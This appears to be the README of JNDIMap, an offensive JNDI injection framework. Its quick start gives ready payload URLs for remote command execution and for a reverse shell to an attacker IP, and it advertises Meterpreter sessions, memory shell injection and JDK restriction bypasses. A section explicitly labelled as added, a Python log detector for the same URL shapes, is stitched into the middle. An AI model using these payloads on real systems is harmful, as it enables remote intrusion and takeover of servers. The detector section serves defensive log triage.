JNDIMap


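JNDIMap is a powerful JNDI injection exploitation framework that supports the RMI, LDAP and LDAPS protocols and includes multiple bypass methods for high-version JDK restrictions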


🚀 Quick Start

Download JNDIMap from the Release page and pass the -i parameter at runtime to specify the external IP

java -jar JNDIMap-version.jar -i 10.0.0.1

Execute a command or open a reverse shell on the target machine

rmi://10.0.0.1:1099/Basic/Command/open -a Calculator
ldap://10.0.0.1:1389/Basic/ReverseShell/10.0.0.1/1337
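For defenders, lookup strings of this shape are what to look for in application and request logs. The following is an added example, not part of JNDIMap or its documentation: it extracts rmi/ldap/ldaps URLs from log lines and labels the two route shapes shown in the quick-start URLs above. The log formats, the allowed directory host and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# rmi/ldap/ldaps URLs embedded anywhere in a log line; the path stops at a quote or brace.
JNDI_URL = re.compile(r"\b(rmi|ldaps?)://([^/\s:\"']+)(?::(\d+))?(/[^\"'}\r\n]*)?", re.I)

# Route shapes copied from the two quick-start URLs above; other routes are not covered.
ROUTES = [
    ("reverse-shell", re.compile(r"^/Basic/ReverseShell/([^/\s]+)/(\d{1,5})(?=\s|$)")),
    ("command", re.compile(r"^/Basic/Command/(.+)$")),  # may over-capture in unquoted logs
]

def classify(line, allowed_hosts=()):
    """Return one finding per JNDI-style URL found in a log line."""
    findings = []
    text = unquote(line)  # request logs usually carry the URL percent-encoded
    for m in JNDI_URL.finditer(text):
        scheme, host, port = m.group(1).lower(), m.group(2), m.group(3)
        path = (m.group(4) or "").rstrip()
        kind, detail = "jndi-url", ()
        for name, rx in ROUTES:
            hit = rx.match(path)
            if hit:
                kind, detail = name, hit.groups()
                break
        findings.append({
            "scheme": scheme, "host": host, "port": int(port) if port else None,
            "kind": kind, "detail": detail,
            # A known directory server is expected; any other host deserves a look.
            "expected": kind == "jndi-url" and host.lower() in allowed_hosts,
        })
    return findings

# Constructed sample log lines (not real traffic); the allowed host is hypothetical.
ALLOWED = ("directory.example.internal",)
SAMPLE = [
    'WARN lookup name="rmi://10.0.0.1:1099/Basic/Command/open -a Calculator" src=203.0.113.7',
    "GET /api?url=ldap%3A%2F%2F10.0.0.1%3A1389%2FBasic%2FReverseShell%2F10.0.0.1%2F1337 HTTP/1.1",
    "INFO connecting to ldaps://directory.example.internal:636/dc=example,dc=internal",
    "INFO healthcheck ok",
]

if __name__ == "__main__":
    for entry in SAMPLE:
        for finding in classify(entry, ALLOWED):
            print(finding)
```

Any finding with `expected` set to false is worth triage even when no route matches, since the route list only covers the two URL shapes shown on this page.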

🚩 Features

  • DNSLog
  • Command execution
  • Reverse shell
  • Meterpreter session
  • Loading custom Java bytecode
  • Memory shell injection (based on MemShellParty)
  • High-version JDK bypass
    • BeanFactory bypass (Tomcat/Groovy/XStream, etc.)
    • JDBC RCE (MySQL/PostgreSQL/H2/Derby)
    • Tomcat Blind XXE
  • LDAP deserialization (includes common gadgets)
  • Nashorn JS custom payloads

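📖 Usage Guide

Full documentation: USAGE.md

⚙️ Build

The builds on the Releases page may lag behind the source, so it is recommended to pull the source and compile it yourself (based on JDK 8)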

git clone https://github.com/X1r0z/JNDIMap && cd JNDIMap
mvn package -Dmaven.test.skip=true

